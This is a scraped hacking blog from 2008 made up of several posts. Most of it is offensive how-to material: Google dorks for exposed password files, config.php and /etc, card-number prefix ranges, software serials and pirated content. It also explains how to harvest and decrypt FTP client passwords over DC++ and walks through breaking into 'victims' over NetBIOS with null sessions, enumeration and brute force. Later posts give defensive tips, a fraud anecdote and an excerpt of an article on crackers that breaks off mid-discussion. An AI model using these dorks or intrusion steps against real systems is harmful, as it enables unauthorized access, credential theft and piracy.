allinurl: admin mdb
"ORA-00921: unexpected end of SQL command"
inurl:passlist.txt
"Index of /backup"
"Chatologica MetaSearch" "stack tracking:"

Amex Numbers: 300000000000000..399999999999999
MC Numbers: 5178000000000000..5178999999999999

visa 4356000000000000..4356999999999999

"parent directory " /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory "Xvid -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory "MP3-xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " Name of Singer or album -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
Notice that I am only changing the word after the parent directory, change it to what you want and you will get a lot of stuff.

METHOD 2

put this string in google search:

?intitle:index.of? mp3

You only need add the name of the song/artist/singer.

Example: ?intitle:index.of? mp3 jackson

METHOD 3

put this string in google search:

inurl:microsoft filetype:iso

You can change the string to watever you want, ex. microsoft to adobe, iso to zip etc…

"# -FrontPage-" inurl:service.pwd

Frontpage passwords.. very nice clean search results listing !!
"AutoCreate=TRUE password=*"
This searches the password for "Website Access Analyzer"
, a Japanese software that creates webstatistics. For those who can read Japanese, check out the author's site at: http://www.coara.or.jp/~passy/
"http://*:*@www" domainname
This is a query to get inline passwords from search engines (not just Google), you must type in the query followed with the the domain name without the .com or .net
"http://*:*@www" bangbus or "http://*:*@www"bangbus
Another way is by just typing
"http://bob:bob@www"
"sets mode: +k"

This search reveals channel keys (passwords) on IRC as revealed from IRC chat logs.

allinurl: admin mdb

Not all of these pages are administrator's access databases containing usernames, passwords and other sensitive information, but many are!
allinurl:auth_user_file.txt

DCForum's password file. This file gives a list of (crackable) passwords, usernames and email addresses for DCForum and for DCShop (a shopping cart program(!!!). Some lists are bigger than others, all are fun, and all belong to googledorks. =)

intitle:"Index of" config.php

This search brings up sites with "config.php" files. To skip the technical discussion, this configuration file contains both a username and a password for an SQL database. Most sites with forums run a PHP message base. This file gives you the keys to that forum, including FULL ADMIN access to the database.
eggdrop filetype:user user

These are eggdrop config files. Avoiding a full-blown descussion about eggdrops and IRC bots, suffice it to say that this file contains usernames and passwords for IRC users.

intitle:index.of.etc

This search gets you access to the etc directory, where many many many types of password files can be found. This link is not as reliable, but crawling etc directories can be really fun!

filetype:bak inurl:"htaccess|passwd|shadow|htusers"

This will search for backup files (*.bak) created by some editors or even by the administrator himself (before activating a new version).

Every attacker knows that changing the extenstion of a file on a webserver can have ugly consequences.

Let's pretend you need a serial number for windows xp pro.

In the google search bar type in just like this - "Windows XP Professional" 94FBR

the key is the 94FBR code.. it was included with many MS Office registration codes so this will help you dramatically reduce the amount of 'fake' porn sites that trick you.
or if you want to

find the serial for winzip 8.1 - "Winzip 8.1"

hack ftp site via google

2008-01-23T11:11:00.002-08:00

You all know or should know that there is SEVERAL ways to do something, they all might be right.I'm going to show you the most simple but most rewarding also (in my opinion) way to get access to ftps.

You start with downloading DC++ from google. For all of you who doesn't know what DC++ is then it is a p2p software to share files.It's not like Kazaa or something so you just don't search, you have to enter "hubs" (it's like rooms kind of) and search for the files in there.Every hub got their own rules, for example you must share atleast 10GB to enter it or something. But there are also hubs with none share limit so you can enter them right away, but they aren't really the best.I would reccomend to get maybe 50GB share or something because then you can enter MOSt of the hubs. The better hubs you enter the higher is the chance that you will find password.

Right when you've downloaded DC++ and made all the configurations then enter a good hub (one with alot of people).Now to the harvesting password part. To get hold of password you need to get some dat files. For example some ftp clients store their passwords in files.One of the most popular clients is Flash FXP, that client stores the password in the sites.dat file.So what you do is to search for the sites.dat file in DC++ and then make sure that you uncheck the option "Only find user with free slots" since the file you are going to download only take around 3 kb or something. Then you are able to download it even if your target doesn't have any free slots.Right after you've downloaded around 5 of them go to google and search for Flash FXP password decrypter.Then just open the sites.dat file with notepad and decrypt the passwords. Tada! You can now enter the ftp, unless they changed it of course.

Another way is to search for another clients password file. One called WS FTP32.Hmm now when I think about it I don't really remember butI think the
file was called wsftp.ini .You could use an online decrypter to decrypt those passwords... you could just google it or go to:
h77p://www.hispasec.com/directorio/laboratorio/Software/ws_ftp.html

hacking using netbios

2008-01-23T11:11:00.001-08:00

hack using netbios
Introduction.

Netbios stands for Network Basic Input Output System and is probably the easiest way to hack a system remotely. It was originally developed by IBM and Sytek as an Application Programming Interface (API) for client software to access LAN resources. Like any other service, works on a port (in this case on port 139).
NOTE: U can use any port scanner to find a system running netbios, by scanning for port 139. A specific scanner for netbios is "XSharez" which u can find it in our "scanners" download section.
Nbtstat command.
We can manually interact with netbios, by using the command prompt and nbtstat comand. Just go to Start-> Run -> and type in "command" or "cmd" . Ur MS-DOS window 'll open. Now type in nbtstat/? and u 'll get somthing like:
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\>nbtstat/?

Displays protocol statistics and current TCP/IP connections using NBT
(NetBIOS over TCP/IP).

NBTSTAT [ [-a RemoteName] [-A IP address] [-c] [-n]
[-r] [-R] [-RR] [-s] [-S] [interval] ]

-a (adapter status) Lists the remote machine's name table given its name
-A (Adapter status) Lists the remote machine's name table given its
IP address.
-c (cache) Lists NBT's cache of remote [machine] names and their IP
addresses
-n (names) Lists local NetBIOS names.
-r (resolved) Lists names resolved by broadcast and via WINS
-R (Reload) Purges and reloads the remote cache name table
-S (Sessions) Lists sessions table with the destination IP addresses
-s (sessions) Lists sessions table converting destination IP
addresses to computer NETBIOS names.
-RR (ReleaseRefresh) Sends Name Release packets to WINS and then, starts Refresh

RemoteName Remote host machine name.
IP address Dotted decimal representation of the IP address.
interval Redisplays selected statistics, pausing interval seconds
between each display. Press Ctrl+C to stop redisplaying
statistics.

NOTE: The main command that we are going to use is c:\>nbtstat -a ip ex. c:\>nbtstat -a 100.100.100.100
After we use the above command, we 'll get a somthing like:
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------------
user <00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered
MAC Address = 00-02-48-18-29-E7
NOTE: The important think here (which actually tell us that the file and printer sharing is enabled on victim's system), is the <20>.
NOTE: If we dont get a <20>, then this means that file and printer sharing is not enabled on victims system and we must search for other victim.
Now we type in MS-DOS (which should be still opened) c:\>net view \\ip ex. c:\net view \\100.100.100.100
Share name Type Used as Comment
-------------------------------------------------------------------------
CDISK Disk
HP-6L Print
OK, now we can see that our victim is sharing a disk named as CDISK and printer sharing with name HP-6L.
NOTE: If we are able to share the victims hard disks or folders or printers we will be able to read write to the folders or hard disks or we may also be able to print anything on a remote printer.
Normal connection.

Just type in MS-DOS c:\>net use k: \\100.100.100.100\CDISK
NOTE: Letter k can be anything u like. It 'll appear in ur "my computer" and u'll be able to control ur victim's system (like copy-paste-delete, read-write etc.)
If u get a confirmation as "Command was completed succesfully", then just go to "my computer" and open the k:\ driver (which 'll be ur victim's driver on ur PC) and do anything u like.
Connection with Null Session.
For null session, we must use c:\>net use \\100.100.100.100\IPC$ "" /u .
NOTE: If we get Command completed succesfully, then we are connected anonymously. If we got an error like ex. System error 51 occured or Host not found, then the victim has set on the RestrictAnonymous to avoid anonymous connections.
Collection of informations
• CIS or ENUM
• NAT (Netbios Auditing Tool)
NOTE: Those tools are in our "Scanners" Download section. Go get them. We are going to use them to collect info from victim.
ENUM (works from command prompt):

usage: enum [switches] [hostname|ip]
-U get userlist
-M get machine list
-N get namelist dump (different from -U|-M)
-S get sharelist
-P get password policy information
-G get group and member list
-L get LSA policy information
-D dictionary crack, needs -u and -f
-d be detailed, applies to -U and -S
-c don't cancel sessions
-u specify username to use (default "")
-p specify password to use (default "")
-f specify dictfile to use (wants -D)

If we type (in ENUM command prompt) enum -U -S -G 100.100.100.100 , ENUM 'll try to connect to victim with a null session (doesnt matter if we already did) and we 'll get some info about victim. See below for example.

server: 100.100.100.100
setting up session... success.
getting user list (pass 1, index 0)... success, got 7.
Administrator Guest AM2o Cynos Sisqo printer
enumerating shares (pass 1)... got 6 shares, 0 left:
IPC$ print$ C ADMIN$ C$ CanonCLC320
Group: Administrators
AM2o\Administrator
Group: Backup Operators
Group: Guests
AM2o\Guest
Group: Power Users
AM2o\AM2o
AM2o\Cynos
AM2o\Sisqo
Group: *******
Group: Users
NT AUTHORITY\INTERACTIVE
NT AUTHORITY\Authenticated Users
AM2o\printer
Group: Debugger Users
NT AUTHORITY\SYSTEM
cleaning up... success.
NOTE: We can see from here the system name: AM2o, users: Administrator, Guest, Cynos, Sisqo, places sharing: IPC$ print$ C ADMIN$ C$ CanonCLC320, power users: AM2o, Cynos, Sisqo. You can use and the other commands to select more info if u like.
CIS (Cerberus Information Security):

Just set a host (without http://) or an ip (ex. 100.100.100.100), then go to "File" -> Select module and set "netbios checks". This 'll automatically select information. When completed, press view report. The advantage about CIS, is that when it finds a user, automatically try to find the password too (i'll explain later about passwords) if exists.
NOTE: The symbol $, indicates the hided places ex. $ADMIN is the %systemroot% (for windows NT and 2000 C:\winnt for XP C:\windows etc.). Those places are protected with passwords. So, try to avoid those places (for now). ex. if sharing places are IPC$ print$ C ADMIN$ C$ CanonCLC320, then use net use \\100.100.100.100\C .
NAT (Netbios Auditing Tool):

This is a very good tool which 'll try to find the sharing places and get through the passes. It uses userlist and passlist that we define, so collect as many info as u can with ENUM and/or CIS.

Usage: nat -o results.txt -u userlist.txt -p passlist.txt 100.100.100.100
NOTE: If password finally founded, we use net use k: \\ip\place * /u:user ex. net use k: \\100.100.100.100\C * /u:Cynos and when we asked for pass, just type it and u are connected. U 'll get "Command completed succesfully".
NOTE: Another one good tool like NAT, is PQwak2, which u can get it here.
Disable File Printer sharing.
• Click the Start Menu and choose Settings, Control Panel.
• Double-click the Network icon.
• Click the Configuration tab.
• Click the File and Print Sharing button. The File and Print Sharing dialog box will appear.
• Make sure that the following two boxes are NOT checked
"I want to be able to give others access to my files"
"I want to be able to allow others to print from my printers"
• Click the OK button in the File and Print Sharing dialog box.
• Click the OK button in the Network control panel.
A prompt box will appear requesting you to restart your computer.
(If no changes were made, this box may not appear.)
• Restart your computer for your new setting to take effect .

how to not get hacked

2008-01-23T11:09:00.000-08:00

How Not To Get Hacked

Protect Urself !
Follow These Simple Guidelines n u are done

1. Stop using Internet Explorer and make the switch to Opera, it's more secure, plain and simple.

2. Get Spybot Search and Destroy or Spyware Doctor and immediately update it.

3. Get Adaware SE and immediately update it.
(Use both as a 1-2 punch on infected client computers and between the two there's not much they won't kill)

4. Update your anti virus

5. Boot into safe mode and run all three scans

6. While the scans are going check your registry (Click start --> Run and type regedit to get intot he registry) and look in HKEY_CurrentUser/software/microsoft/windows/currentversion/run & HKEY_Local_Machine/software/microsoft/windows/currentversion/run. Verify that all programs listed are legitimate and wanted.

7. If or when your antivirus scan comes across anything, search for that file name in your registry and delete it.

8. Use explorer to go to the windows/system32 folder and sort by date. If you haven't already done so, make sure you can see the entire file names. click Tools --> Folder Options and unclick the box labeled "Hide extensions for known file types" and under Hidden files and folders click "Show hidden files and folders." However, make sure you choose "Hide protected operating system files" so you don't accidentally remove anything that would cripple your computer.. You are looking for recent files with names ending with .exe and .dll that look suspicious. Major culprits will have gibberish names such as alkjdlkjfa.exe.

9. Once you can get clean scans in safe mode, reboot in normal mode and scan all over again. If you can't get a clean scan in regular mode then you have something more persistant that could take more research.

10. Make sure your firewall doesn't have strange exceptions.

11. If you suspect anything that is going wrong with your computer is the action of a stalker, on a more secure system change all your passwords.

12. If your system has been specifically targeted and hacked you can never be 100% sure that your system is no longer compromised so start with 11, make backups of personal files on the infected system and format and re-install Windows.

Good luck!

chat with ur friends

2008-01-23T11:08:00.000-08:00

Have a Chat With Your Friends Without any software
Hey buddies or their buds, This a trick through which you can chat with your friends/enemies/or even to me.........without any software installed into your computer!

here it goes...........

1. All you need is your friends IP address and your Command Prompt.

2. Open your notepad and write tis code as it is.................. I would prefer you to copy this !

@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A

3. Now save this as "Messenger.Bat".

4. Drag this file (.bat file)over to Command Prompt and press enter!

5. You would then see some thing like this:

MESSENGER
User:

6. After "User" type the IP address of the computer you want to contact.

7. Before you press "Enter" it should look like this:

MESSENGER
User: IP_Address
Message: Hi, How are you ?

8. Now all you need to do is press "Enter", and start chatting

How To Hack Your Own Cell Phone & Save $$

2008-01-09T04:13:00.000-08:00

google 2nd page

copy this link and see

http://www.youtube.com/watch?v=7Lz-XGjynN8

Selling Your Laptop on eBay

2008-01-09T03:22:00.000-08:00

My mother, a longtime flea-market shopper, says it's always easier to buy than to sell. Man oh man, is she right about that.
Twice in just over a week, my efforts to sell a laptop on eBay were thwarted. One effort climaxed in an excruciatingly anxious dash to the post office--to retrieve the laptop I had just shipped.
Here's the story, in a nutshell, followed by a few lessons learned.
Acting Without Authorization
In early 2007, I bought my sweet little Sony Vaio TXN19P/L ultraportable to use as a secondary computer. (Read my review of a similar Vaio laptop. It's been an ideal traveling companion: The laptop weighs just 2.8 pounds and goes for 5 hours or more on a charge. It has a gorgeous screen and beautiful Slate Blue carbon fiber casing--it truly is a masterpiece of industrial design.
The laptop was pricey, however. In January 2007 I paid $2800 for this model, which has 2GB of RAM, an 80GB hard drive, and Windows XP Professional. And so, in December, I decided to sell it. I felt it was time to try something new andoh, all right: I needed the money. Plus, I have an older, less glamorous, but still working IBM ThinkPad 240 in my closet. Why not use that?
At any rate, I listed the Sony laptop on eBay on December 8, thinking it would catch the interest of holiday shoppers. I put a reserve price on the laptop as well as offered the "Buy It Now" option.
One week later, as the auction ended, the reserve price was met and the laptop sold. I boxed up the laptop, considering it a done deal. But two hours later, I received a message from eBay, informing me the listing had been "cancelled due to bidding activity that took place without the account owner's authorization."
And then eBay wiped out the listing. It was as if it had never existed. Worse, eBay informed me of the following: "Unfortunately, it is not possible for us to automatically relist these items for you. Instead, to relist these items you will need to start from the beginning of the listing process...We know that this is an inconvenience and we apologize for the negative impact it may cause you. We are working on tools to allow you to relist your items without starting from the beginning, but they are not available at this time."
In other words, to relist my laptop on eBay, I had to start all over again.
When I asked eBay about this, a spokesperson responded in e-mail: "The current process where we cancel the listing is optimized around immediately refunding the seller's full fees (listing fee and final value fee). We realize that this solution can also have its drawbacks--specifically the inconvenience to the seller of having their listing removed and also the inability to offer Second Chance Offers to any underbidders, which is way eBay is always looking for ways to improve its services to its users."
Bolting Like Batman
On December 17, a few days after the laptop's second listing appeared, someone from Indonesia contacted me via e-mail and asked if I would ship to Bali. I was hesitant, as I worried about Customs forms and other details I wouldn't have to deal with if selling to a U.S. buyer. I checked the potential buyer's eBay feedback--it was nearly 100 percent positive. So, even though I had reservations, I agreed to sell to him.
Minutes later, the man from Bali used the "Buy It Now" option to procure my laptop and pay me via PayPal. He urged me to ship it to him right away, to be sure he could get it in time for the holidays. At 1:19 p.m. (Pacific Standard Time), I received an e-mail from PayPal, informing me the funds were in my account. So I labeled the box containing the laptop and headed to the post office.
I groaned when I saw the long line at the post office, but I expected as much at this time of year. I filled out the necessary forms and waited in line for about 30 minutes. All told, everything went smoothly. Still, I wondered: Am I doing the right thing?
After returning home, I went back to work. Around 4:45 p.m., I checked my e-mail and discovered one from PayPal (sent at 4:16 p.m.). This one informed me that I "may have received an unauthorized payment...We have placed a temporary hold on the funds until the investigation is complete."
Dear reader, you should have seen me tearing out of my office, jumping into my car, and rocketing to the post office, like Batman out to save Gotham. Would my package still be there?, I fretted. Would they give it back to me?
When I arrived at the post office, it was about 5 p.m. The line was even longer now--nearly snaking out the door. I took my place at the end and fidgeted. What if a truck with my laptop on it is driving away at this very moment, while I'm standing in line?
I asked the person behind me to save my place in line. Then I dashed to the counter and told the clerk I had an emergency. Had their trucks picked up any packages in the last half hour or so? The clerk, who had no doubt seen a lot of foolishness that busy day, eyed me warily and said no, he didn't think so, but go to the back of the line.
For the next 45 minutes, while I waited in line, I took deep breaths and tried to remain calm. Finally, it was my turn, and after some explaining, I was mercifully reunited with my package and refunded the $61 shipping charges.
By the time I returned home, PayPal had determined the buyer had purchased my laptop fraudulently and had removed the deposit from my account.
Learning Lessons
I must admit this ordeal left me feeling a bit foolish. But I decided to write about my experience to underscore the potential peril of selling an expensive laptop over the Internet to a stranger.
On balance, I've sold dozens of things on eBay before and never experienced fraud. Once, someone didn't follow through on his winning bid, but that's the worst of it. And as an eBay buyer, I've never received anything that wasn't what I had expected.
Nonetheless, I've learned some valuable lessons. First: Trust my instincts. I didn't have a good feeling about the second buyer, and I was right. Second: In the future, I will wait 24 hours after receiving payment before I ship an item, especially for big-ticket items like a laptop. Granted, PayPal alerted me within 3 hours of the fraud. But had I not been able to react quickly, my laptop would have gone to Bali, and trying to get it back would have been a nightmare, if not an impossibility.
A few tips from PayPal regarding selling online:
Beware of unusual requests. Abnormal requests can be a sign of suspicious activity. A few examples include:
Rush shipments at any cost.
Partial payments from multiple PayPal accounts.
Payments not received in full.
Be extra cautious with high-priced items. It's fairly common for shipping addresses to differ from billing addresses. However, be extra cautious when sending high-priced items, especially if payment is received from one country and sent to another.
More tips are available from PayPal.
Next Steps
As for my Sony laptop? Call me a glutton for punishment, but I am going to give eBay one last try. And if this doesn't work, I may try selling it on Craigslist. Or I may just keep the laptop. It really is such a sweet little thing.
For More Information
Video: "EBay Goes Web 2.0"
"What EBay Tells Us about Pop Culture in 2007"
"Tips & Tweaks: All About eBay"
Mobile Computing News, Reviews, & Tips
First HD DVD-RW Laptop: Toshiba's newest Qosmio multimedia laptop is said to be the first with a rewritable HD DVD drive, plus two HDTV tuners. The $3500 laptop recently went on sale in Japan. Toshiba didn't announce overseas launch plans.
New Rules for Laptop Batteries: Beginning January 1, air travelers in the U.S. are prohibited from carrying spare lithium batteries in their checked baggage. The U.S. Department of Transportation's new regulations are designed to minimize the risk of fire, which lithium batteries have been suspected of causing in rare cases. It's okay to have a lithium battery installed in a device, such as a digital camera, in your checked baggage--you just can't have a battery floating around loose in your luggage. Also, you can still carry extra batteries in your carry-on bags, provided they are stored in their original packaging or in a plastic bag. For more details, read "US Bans Spare Lithium Batteries From Checked Bags."
Convert Your Media for the Road: Before you hit the road, you might want to transfer your favorite YouTube videos or TiVo recordings to your portable media player. While this isn't always a straightforward process--iTunes won't let you import DVDs, for example--there are software programs that can make it happen. For details read our step-by-step guide, "Master Your Media."
Suggestion Box
Is there a particularly cool mobile computing product or service I've missed? Got a spare story idea in your back pocket? Tell me about it. However, I regret that I'm unable to respond to tech-support questions, due to the volume of e-mail I receive.

How I’d Hack Your Weak Passwords

2008-01-09T03:20:00.000-08:00

If you invited me to try and crack your password, you know the one that you use over and over for like every web page you visit, how many guesses would it take before I got it?
Let’s see… here is my top 10 list. I can obtain most of this information much easier than you think, then I might just be able to get into your e-mail, computer, or online banking. After all, if I get into one I’ll probably get into all of them.
Your partner, child, or pet’s name, possibly followed by a 0 or 1 (because they’re always making you use a number, aren’t they?)
The last 4 digits of your social security number.
123 or 1234 or 123456.
“password”
Your city, or college, football team name.
Date of birth - yours, your partner’s or your child’s.
“god”
“letmein”
“money”
“love”
Statistically speaking that should probably cover about 20% of you. But don’t worry. If I didn’t get it yet it will probably only take a few more minutes before I do…Hackers, and I’m not talking about the ethical kind, have developed a whole range of tools to get at your personal data. And the main impediment standing between your information remaining safe, or leaking out, is the password you choose. (Ironically, the best protection people have is usually the one they take least seriously.)
One of the simplest ways to gain access to your information is through the use of a Brute Force Attack. This is accomplished when a hacker uses a specially written piece of software to attempt to log into a site using your credentials. Insecure.org has a list of the Top 10 FREE Password Crackers right here.
So, how would one use this process to actually breach your personal security? Simple. Follow my logic:
You probably use the same password for lots of stuff right?
Some sites you access such as your Bank or work VPN probably have pretty decent security, so I’m not going to attack them.
However, other sites like the Hallmark e-mail greeting cards site, an online forum you frequent, or an e-commerce site you’ve shopped at might not be as well prepared. So those are the ones I’d work on.
So, all we have to do now is unleash Brutus, wwwhack, or THC Hydra on their server with instructions to try say 10,000 (or 100,000 - whatever makes you happy) different usernames and passwords as fast as possible.
Once we’ve got several login+password pairings we can then go back and test them on targeted sites.
But wait… How do I know which bank you use and what your login ID is for the sites you frequent? All those cookies are simply stored, unencrypted and nicely named, in your Web browser’s cache. (Read this post to remedy that problem.)
And how fast could this be done? Well, that depends on three main things, the length and complexity of your password, the speed of the hacker’s computer, and the speed of the hacker’s Internet connection.
Assuming the hacker has a reasonably fast connection and PC here is an estimate of the amount of time it would take to generate every possible combination of passwords for a given number of characters. After generating the list it’s just a matter of time before the computer runs through all the possibilities - or gets shut down trying.
Pay particular attention to the difference between using only lowercase characters and using all possible characters (uppercase, lowercase, and special characters - like @#$%^&*). Adding just one capital letter and one asterisk would change the processing time for an 8 character password from 2.4 days to 2.1 centuries.
Password Length
All Characters
Only Lowercase
3 characters4 characters5 characters6 characters7 characters8 characters9 characters10 characters11 characters12 characters13 characters14 characters
0.86 seconds1.36 minutes2.15 hours8.51 days2.21 years2.10 centuries20 millennia1,899 millennia180,365 millennia17,184,705 millennia1,627,797,068 millennia154,640,721,434 millennia
0.02 seconds.046 seconds11.9 seconds5.15 minutes2.23 hours2.42 days2.07 months4.48 years1.16 centuries3.03 millennia78.7 millennia2,046 millennia
Remember, these are just for an average computer, and these assume you aren’t using any word in the dictionary. If Google put their computer to work on it they’d finish about 1,000 times faster.
Now, I could go on for hours and hours more about all sorts of ways to compromise your security and generally make your life miserable - but 95% of those methods begin with compromising your weak password. So, why not just protect yourself from the start and sleep better at night?
Believe me, I understand the need to choose passwords that are memorable. But if you’re going to do that how about using something that no one is ever going to guess AND doesn’t contain any common word or phrase in it.
Here are some password tips:
Randomly substitute numbers for letters that look similar. The letter ‘o’ becomes the number ‘0′, or even better an ‘@’ or ‘*’. (i.e. - m0d3ltf0rd… like modelTford)
Randomly throw in capital letters (i.e. - Mod3lTF0rd)
Think of something you were attached to when you were younger, but DON’T CHOOSE A PERSON’S NAME! Every name plus every word in the dictionary will fail under a simple brute force attack.
Maybe a place you loved, or a specific car, an attraction from a vacation, or a favorite restaurant?
You really need to have different username / password combinations for everything. Remember, the technique is to break into anything you access just to figure out your standard password, then compromise everything else. This doesn’t work if you don’t use the same password everywhere.
Since it can be difficult to remember a ton of passwords, I recommend using Roboform. It will store all of your passwords in an encrypted format and allow you to use just one master password to access all of them. It will also automatically fill in forms on Web pages, and you can even get versions that allow you to take your password list with you on your PDA, phone or a USB key. If you’d like to download it without having to navigate their web site here is the direct download link.
Once you’ve thought of a password, try Microsoft’s password strength tester to find out how secure it is.
EDIT: By request I’ve created a short RoboForm Demonstration video. It ain’t great, but I guess it’s better than nothing. Hope it helps…
Another thing to keep in mind is that some of the passwords you think matter least actually matter most. For example, some people think that the password to their e-mail box isn’t important because “I don’t get anything sensitive there.” Well, that e-mail box is probably connected to your online banking account. If I can compromise it then I can log into the Bank’s Web site and tell it I’ve forgotten my password to have it e-mailed to me. Now, what were you saying about it not being important?
Often times people also reason that all of their passwords and logins are stored on their computer at home, which is save behind a router or firewall device. Of course, they’ve never bothered to change the default password on that device, so someone could drive up and park near the house, use a laptop to breach the wireless network and then try passwords from this list until they gain control of your network - after which time they will own you!
Now I realize that every day we encounter people who over-exaggerate points in order to move us to action, but trust me this is not one of those times. There are 50 other ways you can be compromised and punished for using weak passwords that I haven’t even mentioned.
I also realize that most people just don’t care about all this until it’s too late and they’ve learned a very hard lesson. But why don’t you do me, and yourself, a favor and take a little action to strengthen your passwords and let me know that all the time I spent on this article wasn’t completely in vain.
Please, be safe. It’s a jungle out there.

HOW `CRACKERS' CRACK

2008-01-09T03:19:00.000-08:00

Mercury News Computing Editor Police, prosecutors and most of the press call them "hackers." Computer cognoscenti prefer the term "crackers." Both sides are talking about the same people, typically young men, whose fascination with computers leads them to gain access to computers where they don't belong. A few crackers make headlines, like Robert T. Morris Jr., son of a top computer security expert for the supersecret National Security Agency, who let loose a "worm" program on a national network of university, research and government computers in 1988. There are also notorious crackers like Kevin Mitnick, who was under investigation at the age of 13 for illegally obtaining free long-distance phone calls and was sentenced to prison in 1989 for computer break-ins. Then there are legions of far more ordinary crackers who simply use their knowledge of computers to "explore" intriguing corporate or government computers or simply to go for the electronic equivalent of a joy ride and impress their friends. But they all share something: an air of mystery. How do they do it? At a recent conference on computer freedom and privacy, computer expert Russell L. Brand gave a four-hour lecture on the inner workings of computer cracking. His basic message: Cracking is not as hard as it seems to an outsider, and it often goes undetected by legitimate users of "cracked" computers. "Just because you don't see a problem is no reason to think a problem hasn't occurred," Brand said. "Generally it's a month to six weeks before (operators) notice anything happened and usually because the cracker accidentally broke something." Home computers aren't in danger from crackers because they aren't accessible to outsiders--and because they aren't interesting to crackers. Instead, they target mainframes and minicomputers that support many users and are connected to telephone lines and large networks. Understanding how crackers work and what security weaknesses they exploit can help system managers prevent many break-ins, Brand said. And the biggest problem is carelessness. "When I started looking at break-ins, I had the assumption that technical problems were at fault," he said. "But the problem is human beings." The "Cracker": Most crackers are not bent on stealing either money or secrets but will target a particular computer for entry because of the bragging rights they will enjoy with fellow crackers once they prove they broke in. Typically, the computer belongs to a corporation or the government and is considered in cracking circles to be hard to penetrate. Often, it is connected to the nationwide NSFNet computer network. The attack: Crackers can attack the target computer from home, using a modem and a telephone line. Or they can visit a publicly accessible terminal room, like one on a college campus, using the school's computer to attack the target through a network. At home, the cracker works undisturbed and unseen for hours, but phone calls might be traced. The resources: If the target computer is nearby, the cracker may look through the owner's trash for valuable information, a practice called "dumpster diving." Discarded printouts, manuals or other paper may contain lists of accounts, some passwords, or technical data more sophisticated crackers can exploit. The target: The easiest way to enter the target is with an account name and its password. Passwords are often the weakest link in a computer's security system: Many are easy to guess, and some accounts have no password at all. Sophisticated crackers use their personal computers to quickly try thousands of potential passwords for a match. The cover: To make calls from home harder to trace, crackers might use stolen telephone credit-card numbers to place a series of calls through different long-distance carriers or corporate switchboards before calling the target computer's modem. The way in: Many crackers take advantage of "holes" in the operating system, the software that controls the basic operations of the machine. The holes are like secret doors that either let crackers make their own "super" accounts or just bypass accounts and passwords altogether. Five holes in the Unix operating system account for the bulk of computer break-ins--yet many installations have failed to patch them. The network: Most large computers are connected to several others through networks, a chief point of attack. Computers erect barriers to people but often completely trust other computers, so attacking a computer through another computer on the network can be easier than attacking it with a personal computer and a modem. Ill-used passwords let many pass Passwords are the security linchpin for most computer systems. But these supposedly secret keys to computer access are easily obtained by a determined cracker. The main reason: Users and system managers often are so careless with passwords that they are as easy to find as a door key left under the welcome mat. Part of the problem is the proliferation of computers and computerlike devices such as automated teller machines, all of which require passwords or personal identification numbers. Many people must now remember half a dozen or more such secret codes, encouraging them to make each one short and simple. Often, that means making their passwords the same as their account name, which in turn is often the user's own first or last name. Such identical combinations are called "Joe" accounts, and according to computer expert Russell L. Brand, they are "the single most common cause of password problems in the world." These `secret' keys to computer access are easily obtained by a determined cracker. The main reason: Users and system managers often are so careless with passwords that they are as easy to find as a key left under the welcome mat. Knowing there are Joes, a cracker can simply try a few dozen common English names with a reasonable chance that one will work. Armed with an easily obtained company directory of employees, the task can be even easier. Joe accounts also crop up when the system manager creates an account for a new employee, expecting that the user will immediately change the given password from his or her name to something else. But users often fail to make the change or aren't told how. Sometimes, they never use the account at all, providing not only easy access for the cracker but an account where the owner won't notice any illicit activity. Even if crackers can't find a "Joe" on the computer they want to enter, there are several other common ways for them to find a password that will work: - Many systems have accounts with no passwords or have accounts for occasional visitors to use where the ID and password are both GUEST. - Outdated operator's manuals retrieved from the trash often list the account name and standard password provided by the operating system for use by maintenance programmers. Although it can and should be changed, the password seldom is. - "Social engineering"--in effect, persuading someone, usually by telephone, to divulge account names, passwords or both--is a common ploy used by crackers. - Crackers are sometimes able to obtain an encrypted list of passwords for a target computer, discarded by the owners who mistakenly believe the coded words aren't useful to crackers. While it's true they are difficult to decode, it is easy for a cracker to use a personal computer to take a potential password and encode it. Because most passwords are ordinary English words, crackers can simply run a personal computer program to encode the contents of an electronic dictionary and identify any entries that match passwords on the coded list. - In another form of deception, crackers set up public bulletin board systems whose real purpose is to snag passwords. Because many people tend to use the same password for all their computer accounts, the cracker can simply wait until someone who has an account on the target computer also sets up an account on the bulletin board. The cracker then reads the password and tries it on the target system. While individual users can't delete dormant accounts from their computers or keep an eye on the trash, they can be intelligent about what passwords they use. Brand suggests users choose a short phrase that's easy for them to remember and then use the first two letters of each word as the password. As added protection, users who are able should mix uppercase and lowercase letters in their passwords or use a punctuation mark in the middle of the word.--Rory J. O'Connor The rights of bits Constitutional scholar Laurence H. Tribe, widely considered the first choice for any Supreme Court vacancy that might arise under a Democratic administration, proposed a fairly radical idea recently: a constitutional amendment covering computers. Tribe's proposal for a 27th Amendment would specifically extend First and Fourth Amendment protections to the rapidly growing and increasingly pervasive universe of computing. Those rights would be "construed as fully applicable without regard to the technological method or medium through which information content is generated, stored, altered, transmitted or controlled," in the words of the proposed amendment. I am not a constitutional scholar, but I have to believe that what's needed is not a change in the Constitution, but instead a change in the thinking of judges in particular and the public in general. Tribe acknowledges that he doesn't take amendments lightly, pointing to the ridiculous brouhaha over a flag-burning amendment as an example of what not to do to the basic law of the land. But like many people who are more deeply involved in the world of computers, Tribe sees the issue of civil liberties in an information society as a crucial one. The question is not whether the civil liberties issue is serious enough to be addressed by some fundamental legal change. The question is really how to get people to see that communicating with a computer is speech, and that to search a computer and seize data is the same as searching a house and seizing the contents of my filing cabinet. People seem to have trouble making these connections when computers are involved, even though they wouldn't have trouble recognizing a private telephone conversation as protected speech. Yet most telephone calls in this country are, at some time in their transmission, nothing more than a stream of computer bits traveling between sophisticated computers. Admittedly, computers do make for some complications where things like search and seizure are concerned. Let's say the FBI gets a search warrant for a computer bulletin board, looking for a specific set of messages about an illegal drug business. 